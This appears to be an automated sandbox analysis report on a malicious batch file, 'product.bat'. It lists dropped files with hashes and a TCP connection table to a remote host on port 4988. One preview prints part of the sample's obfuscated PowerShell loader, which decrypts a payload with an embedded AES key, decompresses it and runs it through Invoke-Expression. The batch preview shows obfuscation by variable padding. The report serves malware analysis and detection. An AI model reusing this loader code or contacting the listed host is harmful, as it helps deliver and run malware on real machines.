                                                Preview:ElfChnk.........................................P......a.................................................................... ..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..............T.0.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1666137709834492
                                                Encrypted:false
                                                SSDEEP:384:uwhwCCRzCaCkClCzCYC/CyCVCGCMCvCzCw9CdqCVCICsC:uwKFT
                                                MD5:88E290384531AC91E63C802B158E726D
                                                SHA1:2AFD218C14B290A33DC27B0BDBA87AADFD428D9B
                                                SHA-256:36B48D00709B0F3B917927DE97D395C4785F6A7B61CCC5C72C799C4521FD9D97
                                                SHA-512:7969E4BDC2659D8412FD187135AB04B329AE134E2A5E386D86BA0E490F979621DCE05DF1118FA31987CB5FD27CB964773F4A67D6884002F7E9579A752E5A2AAD
                                                Malicious:false
                                                Preview:ElfChnk.....................................84..p6..........................................................................Pl..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................v)........................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):94816
                                                Entropy (8bit):4.689148126102424
                                                Encrypted:false
                                                SSDEEP:768:4uqAyyAy4QtGRAyumjXAywtLVuqAyyAy4QtGRAyFdUV:d4Qdjq4QSdK
                                                MD5:0CA3CD26D58E2470AC042BC775DF3728
                                                SHA1:DE049F60D03ABC2FA68ABE02C76030597B14AC14
                                                SHA-256:6D075BEC834EE48ADD53D8152E84574D77DFE621C3771FEB25881E726AAE356F
                                                SHA-512:A7972421B4CA8E3305A2911511CBF15832C0D266D5FFF1DCBA6E395CB27A6F1259C14159F5EB7E836F9B372127180199B9AE3052C698A2D73508FF05F788D046
                                                Malicious:false
                                                Preview:ElfChnk..3.......3.......3.......3...........L...O..s..................................................................................................................<...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................M...................................................**.......3.......S..ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                Category:dropped
                                                Size (bytes):79024
                                                Entropy (8bit):1.824304466615825
                                                Encrypted:false
                                                SSDEEP:384:yFhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmIUmxjUmLUmNUphL6UsE0ZUV:2Y7LR4Y7LR
                                                MD5:B9D17E91081C183655469CCB37BC6241
                                                SHA1:4DF3824B189BAA832D075FBB9C3F5E3D0A0F3086
                                                SHA-256:2EEE5EE50E29361164735B22F95FCDC6CD57B5FA8F57245375C7DD3F363B5057
                                                SHA-512:18213E725E38C2FC4356E17AFDCCA99D299FA618FCBB90EE90433128203043D22AD3E72C9868327A69EE8CB173BF898EE8360703941CFADC0F5722FBF7037398
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..04.....h........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................*..............................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.20421823963440697
                                                Encrypted:false
                                                SSDEEP:48:MxAWurP+yQNRBEZWTENO4bhBkcoP/6zk:UNVaO8McoP/6zk
                                                MD5:4F34FFD0A10F87B4BC8B0274329610DC
                                                SHA1:3B087FF2885005FA5AB3119FE6FDB3322ADA6D25
                                                SHA-256:9AB99808207007F63C90DF3F9DC54C3DDCBA7F538FE5B58BEA8E58BD0E0BC157
                                                SHA-512:3432CD3F6091C787EF5264E24FE587AAE1916952B8750942EAE2AC9C84428AB71C123AFE0E9C0657EDC304AE736CA5D3546DFA17BBAF90CC92ABD52C3094BAB0
                                                Malicious:false
                                                Preview:ElfChnk.............................................~r........................................................................_................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**.................4a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.0934111022900845
                                                Encrypted:false
                                                SSDEEP:384:phjivnniDiiuXieuietio0i7riTKhiIViOhin5ibaifiWipiUiKijiTVijiHiBRY:pon6ufC/hCI4MWs8PM9QSp
                                                MD5:C03DC232AFCDF6316B6CC7D1D5266423
                                                SHA1:8B90D640BB1B09E8C61117DE6B00B93CB1FE69A0
                                                SHA-256:198FDBBBC7444C323E7DBFB5B6D5B6AB870587FE7B740A05C22C6821B0508D16
                                                SHA-512:192E77738FC7A6493DFA22C5A56EA01E4A502219756578AE772C4FB0A1074617A21523D1029C6C9DDF15798D0968A0C14C8B723EAB0B91BD01F9967540C04DE9
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):72472
                                                Entropy (8bit):2.439060786996042
                                                Encrypted:false
                                                SSDEEP:384:Vpb5pgipPpQfjpYpK4p6ip8Ghecp/PpohCpPpaLpypDpWpywp7pdKpApWZqhpaed:ANRTgshamoZqP+INFanNRT
                                                MD5:36BB122FDE2A083A8B7C9B7A12C596F1
                                                SHA1:0E4E214E475BD43F12913BC2D11C1E8687DE704B
                                                SHA-256:3C80C7CA594DF84263FF62667BB0BBBAB5163CBB0742969E8D153CB96430A09F
                                                SHA-512:164E55D733816702DC4AF5CACF1E60279BC6FBE8C33558EF6B4BA97BC7E0C21C5A776377F0E1E23D22AB3A12318318C116526B04A67559D63C481901D4F7CA1C
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3919409988581557
                                                Encrypted:false
                                                SSDEEP:768:SiasFkawaTakafalaxaUasa/amadaiawaDa3ajaXavaDaLavabaTaLaTa7aTavaT:vF
                                                MD5:E8DFBF8E4A0A3BE1855F63BB88FEA9B4
                                                SHA1:5531DE053D5A619ED87057D1B9024548A1618205
                                                SHA-256:F3FA667B3C12A8277C7045B7AC9F5F1EC5DB05464BCFDC0BB2463A4DFF5E28AD
                                                SHA-512:3F2328A635CF8D7FCF16152E8B3BD5CE530596AB8D4E86ABD1BD128AED95615DE806D99FDCB40CA95474876C41BED78F46CFA04F3D4C159240A375BB05F7A551
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.4157482482643835
                                                Encrypted:false
                                                SSDEEP:384:8haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJgXJRpXJBgXJQXJBvXJnXJSc:8Q0yUkNYwD8imLEoRfBoYb5GO
                                                MD5:A886E83D1948FFB2BF4A2B744DDCCBD3
                                                SHA1:0074C53E8984FB0024DE0485447D3E1081B34D0B
                                                SHA-256:6DD70CE24E770699A142E13D62B090F64E00CD0A8501FC2D31E0ED5F9DFAB004
                                                SHA-512:3263F89608AEB4140553E587A3946E352391DAAC7DF85ABF0358A39B45103655DAE1DE29616A71142C4BB42FD1C0273F3E3B2F6900CCDE672F36ADBB3F7629D1
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.342266575776689
                                                Encrypted:false
                                                SSDEEP:384:Chbm8mJmAwmsmkmtmZjm9mEJmSmSgmMmJmyFmgmPm4mOmdm9mHbkmzm7m6mBmdmv:CA74DcxI1c8PF
                                                MD5:302AE7C3FB3FBC33D19DBFB4CA97D867
                                                SHA1:86165BE8A181F1DE44CC86F75E36890C0379AB94
                                                SHA-256:1183791BE47DD2268E48827BC2B2F8D2F50C6265AF23904E15E35A8A4715B3DB
                                                SHA-512:AEE86973AE3C7844DF4EAA3406ECCF1AD59EF458F1623A35B84246B26C83229441B76C64A2502D2F9EF298DAF450D0069C6180A99B041A1D2B9DAD57B6F8A816
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.711346426112008
                                                Encrypted:false
                                                SSDEEP:192:7V7rDiDxFYzDiDPDiDfDiDDDiDxDiDUDiDgDiDsDiDQDiDEDiDYDiDEDiD:7hr2ts2T2z2n2N2w202w2M2Y2E2I2
                                                MD5:F911674F42FFA9096A39B15D79861134
                                                SHA1:14C46673DAB47906E3693ABC048CD0C2FADBECB6
                                                SHA-256:1668A045EF7528D741AAD61574F673D564D9BC7831A57FB6CD4A4D25C3FCA4B5
                                                SHA-512:2341C1145DCD1E714D0A16CFE517CCD8F0BF6F94A45882A4142B2D90B27A1ACD4F4508AF7E49A52B0B0F2E418EEC461EF2CBB0463D48CC48E08E6880A617B442
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.841712479680417
                                                Encrypted:false
                                                SSDEEP:384:aBh7RucVRDRbR2R3RgRxR5RrGRRrRuRVRERfRzRwRQRoRTyDR6RQR36RMGRPRHR8:aBNzUhK3aD
                                                MD5:DADAD412976D9F9EA0EED52DE42DF6E7
                                                SHA1:A928A47DCDBB2FA1D7C86470B0AE3AB72FE372E6
                                                SHA-256:4394C069F66A90CEC76AB185BA009B13234EDC4A2ED3A5890FA787FAD0E730A6
                                                SHA-512:AD8DF9C5410CA28CA38BF35CD51A97E1ACFA9B76AA51C4D8A7D59D88CFBC68E3BEB7F3EE2F647ADD9126C6718F720F4316D37C923E3F57AD1620B4CB17F269D5
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.260359446709512
                                                Encrypted:false
                                                SSDEEP:384:fhRhwhdhP0h9hzehShchawhZh4hhhshphihXhMhxhzhwhohGh5h3hShChWhzhLh4:fmFpkBzBiELmn
                                                MD5:067AD5BE5D9DAC2F9972EA7CCD899B43
                                                SHA1:EDD013A75A95D510CCEBA7DF86938621FA17E518
                                                SHA-256:EE5349F31C79D30F8AB2023451ECC640BD33C7F038ED6951D0F9FF2FE82BA0E7
                                                SHA-512:F2E20C281CD6E14FBDDCE8C89055CF5BC6A3C79E5D65037B269B11F2500E750A15998C9A29365F7D5903E4CF568EA45026E9F340A0318C212E8AD936EA2B3F65
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2594795605878295
                                                Encrypted:false
                                                SSDEEP:384:LhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVHV7Vj0V1VXFVq:LyjbPac
                                                MD5:33C02B19501869BF7DF6F6BF1D2E6BF6
                                                SHA1:D90AF4BD50FE734A1E74ACC4E0704FEE1346F8D4
                                                SHA-256:6453729FD9D539566FC7AA3CE013B958C237E0E713AA917444F453C02A96F3BB
                                                SHA-512:B4D4A162E59651477CE87DE756F9DBD7634A206CA7FA83CA61DD73F86CAE343083AFF067A981DE096AAB1AE6997E599397E4851648800B2BCDAA6E5BAC0797A8
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.222797681939505
                                                Encrypted:false
                                                SSDEEP:384:vRhcBwBuBwB+BwBZwDIBwBoK/oyBwBY/puBwBN0bNoBwByQZBwBY/UUBwBY/5BwL:JI0bKWHrL
                                                MD5:3B70AE481901772C5DA852F7B1ACD786
                                                SHA1:F09B57721AC9A69207032EFDFB2692A93458F50A
                                                SHA-256:070A510039728BF70064D5FC10DAE57DA67C69A5FA6ECE870D0E4C2C1A2AC354
                                                SHA-512:B7E9B57B32774D821C3759E8E9FA5A16E99E02D801EB9F7494C940B79690378249536FAF4D23282CEEE595DD00644BFAE6BAECE724B830BC17847797C52CE28A
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.423183909657457
                                                Encrypted:false
                                                SSDEEP:384:/hGUEBUEYUEQUEhUE8UE5UE5UE8UExUEFUELUEVUEyUEXUEDUEuDUEBUEWUEzUE3:/P7s3NxG9
                                                MD5:718C0E7FA4C2A524A5FF961FEB987C13
                                                SHA1:73CB0C09C67332548F50613AA349E12695C715A2
                                                SHA-256:461F7778DD38ABE30403674C9E34EFF22F91AB7D4C207FB8CD2C4B31773588CC
                                                SHA-512:6A7705597D00B2193F3ECD79CDCD4B6D97DA36B879ECBC2E5F8EA3A8B77D9FA301B14E68BBB9ACBBF72B695DC83E66493F3C4D1DD94B1FC9D0E4ABA787BD853B
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):75688
                                                Entropy (8bit):4.270608972262599
                                                Encrypted:false
                                                SSDEEP:384:dFRCBu2s7N0oGMtUlXoxMtTl3AgFRCBu2s7N0oGMtUlXoxMtTl3ApovMtYolQM3g:/S+69S+6ONASbkh
                                                MD5:95D16DD44181BF63726777AA40B87BF7
                                                SHA1:DF13A03F1E0AEFD9443EE7DC1B8AC2F271A14136
                                                SHA-256:F913B2271EA1A9676BC7A3A73393BE700BA16E97BAA3A0C18CBC3CCF178C4896
                                                SHA-512:4202C520DE768436162A2F2EC0A3DFDB2E37728F9D21B9B99A377CB6C6F032ACBA1D6B39FF7889009A8E1E1B5F409C28E49DAE905D24AAAA1650CF3E1A0EF96F
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):83744
                                                Entropy (8bit):4.426183207436119
                                                Encrypted:false
                                                SSDEEP:384:QFRXABHIBwpYCs3Go3+ztJyjsFRXABHIBwpYCs3Go3+ztJyjpI74mjo6bPwtrQMz:mWWDKWWDXi1UW0N3HpRAtFdWWDRc
                                                MD5:BCF574E305425737D4E12CA8E7EED110
                                                SHA1:6316CB1929AD9649B32EA95791676D0042A1DA53
                                                SHA-256:F3554C957866BA94242085947DFA6E44EE2BB68A18DE26106D8EC60241F4FA78
                                                SHA-512:B5D292EC172211DA35BC38AB87BBA9AC322BA675A04DD32C090FAAC206D5CCFC7DE84D581FA2C8120EBDFE38F58D922471902B2FC45F770CCD4B35DEA009F770
                                                Malicious:false
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):80608
                                                Entropy (8bit):3.834523967266329
                                                Encrypted:false
                                                SSDEEP:384:1Q+wG828Q+wG822N4As47t+9t+v3uHaQ3Ry3iOEKTr3I8/ZuzqSc7OYJshxuxn84:1sGN4r47OXHaQhy3ixjp
                                                MD5:B740878AFA430C0B2AA2F2224BEEC76C
                                                SHA1:B632B0AE478C477C69169251B3E79C6BD9B1B1AD
                                                SHA-256:D5630350D12270372CC82088D2F580550BACA955EA5211FE90ABDF9380098F79
                                                SHA-512:F36080D9C61FF30E2D0019E59600BCCC094B0D29B219EAD8085207C8B9A0422B6281E94602FC32906CF1D4A26A7D1822B782B2F23AF82E312B8B925DE6AE4D90
                                                Malicious:false
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (2187), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2390
                                                Entropy (8bit):5.7490302094337595
                                                Encrypted:false
                                                SSDEEP:48:9JFHDRIR5RzxRxBB3rkxB3hXlQiyBluoD0FEQ1C0bWAo2U82UI2U7n+:PFHDRIDxx7BB7GB5lQr6KrQbHo2T2/2Z
                                                MD5:0A3E9785482BA3B6B8B08D5FAB6B2D10
                                                SHA1:A8B86D25505BFC949AC95AF9E7D9D94E739A3B14
                                                SHA-256:E3D153DDBB7B48D09C1AB188737F91809C3C2622F5067C56BECEAB3DEE97C7C0
                                                SHA-512:C8CE77FB1A5A2C427181472DD640D7F3AFFD5844730A08311C9295555C54534BC5A4B39C88609162997171BC2F90C9A541B55EBDC052B8E210B917D42A7DAD12
                                                Malicious:false
                                                Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function vhVnA($zVdEq){.$TQYfY=[System.Security.Cryptography.Aes]::Create();.$TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA=');.$TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q==');.$bqyNP=$TQYfY.CreateDecryptor();.$fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length);.$bqyNP.Dispose();.$TQYfY.Dispose();.$fZHAT;}function FpYMp($zVdEq){.Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', '');.Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*S
                                                File type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Entropy (8bit):6.016969361705345
                                                TrID:
                                                • BibTeX references (5501/1) 100.00%
                                                File name:product.bat
                                                File size:7'309'406 bytes
                                                MD5:f3454e2cb275019527e248cb08111111
                                                SHA1:4180893cca4dce02e0bbeab52b5a099201db5ffb
                                                SHA256:0999322e8a2a984b5400544b31a91ae8dd49b362a2517fe497a8e1455de07d8f
                                                SHA512:489a89ab9d9a1423ccd18931f74707851d4e3add00306f7bdccce511de308d1fabc14cb734925d78609fd522402e9abea1106b1765d5c90a27c32a2a5889c7cc
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                TLSH:847633923EE42FDE0BAEC51EF15E7AAD67D60F53446EE08745E212C7067EE822D12C11
                                                File Content Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfm
                                                Icon Hash:9686878b929a9886
TCP traffic. All of it is between the analysis host (192.168.2.7) and 103.230.121.81 on 4988/tcp; the DNS tables further down show that address being returned for iam.nigga.dad, which the sample resolves twice via 1.1.1.1 (transaction IDs 0xb98e and 0x4772). Each client port below is one connection.

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:31:44.906560898 CET | 49764 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:45.026395082 CET | 4988 | 49764 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:45.026478052 CET | 49764 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:45.069238901 CET | 49764 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:45.188967943 CET | 4988 | 49764 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:47.716533899 CET | 4988 | 49764 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:47.717075109 CET | 49764 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:47.723992109 CET | 49764 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:47.843774080 CET | 4988 | 49764 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:51.184678078 CET | 49780 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:51.304583073 CET | 4988 | 49780 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:51.304728031 CET | 49780 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:51.305171013 CET | 49780 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:51.424901962 CET | 4988 | 49780 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:53.994916916 CET | 4988 | 49780 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:53.995014906 CET | 49780 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:54.007051945 CET | 49780 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:54.126924038 CET | 4988 | 49780 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:57.389427900 CET | 49794 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:57.509746075 CET | 4988 | 49794 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:31:57.510284901 CET | 49794 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:57.510284901 CET | 49794 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:31:57.630240917 CET | 4988 | 49794 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:00.213212967 CET | 4988 | 49794 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:00.213335991 CET | 49794 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:00.214236975 CET | 49794 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:00.333976984 CET | 4988 | 49794 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:03.597726107 CET | 49808 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:03.717781067 CET | 4988 | 49808 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:03.717938900 CET | 49808 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:03.718460083 CET | 49808 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:03.838277102 CET | 4988 | 49808 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:06.435007095 CET | 4988 | 49808 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:06.435105085 CET | 49808 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:06.435539961 CET | 49808 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:06.555463076 CET | 4988 | 49808 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:10.168483973 CET | 49825 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:10.289613008 CET | 4988 | 49825 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:10.289802074 CET | 49825 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:10.290107012 CET | 49825 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:10.411497116 CET | 4988 | 49825 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:13.028764963 CET | 4988 | 49825 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:13.028918028 CET | 49825 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:13.029366016 CET | 49825 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:13.151463985 CET | 4988 | 49825 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:16.309225082 CET | 49840 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:16.527679920 CET | 4988 | 49840 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:16.527818918 CET | 49840 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:16.528166056 CET | 49840 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:16.647841930 CET | 4988 | 49840 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:19.222346067 CET | 4988 | 49840 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:19.222475052 CET | 49840 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:19.222812891 CET | 49840 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:19.342523098 CET | 4988 | 49840 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:23.715643883 CET | 49857 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:23.835444927 CET | 4988 | 49857 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:23.835540056 CET | 49857 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:23.835954905 CET | 49857 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:23.955765009 CET | 4988 | 49857 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:26.528444052 CET | 4988 | 49857 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:26.528553963 CET | 49857 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:26.532408953 CET | 49857 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:26.652323008 CET | 4988 | 49857 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:30.065619946 CET | 49872 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:30.185944080 CET | 4988 | 49872 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:30.186074018 CET | 49872 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:30.186475992 CET | 49872 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:30.306360006 CET | 4988 | 49872 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:32.866753101 CET | 4988 | 49872 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:32:32.866816998 CET | 49872 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:32.867218971 CET | 49872 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:32:32.989048004 CET | 4988 | 49872 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:33:06.990341902 CET | 49883 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:33:07.111438036 CET | 4988 | 49883 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:33:07.111531973 CET | 49883 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:33:09.873281956 CET | 4988 | 49883 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:33:09.873404980 CET | 49883 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:33:11.980873108 CET | 49883 | 4988 | 192.168.2.7 | 103.230.121.81
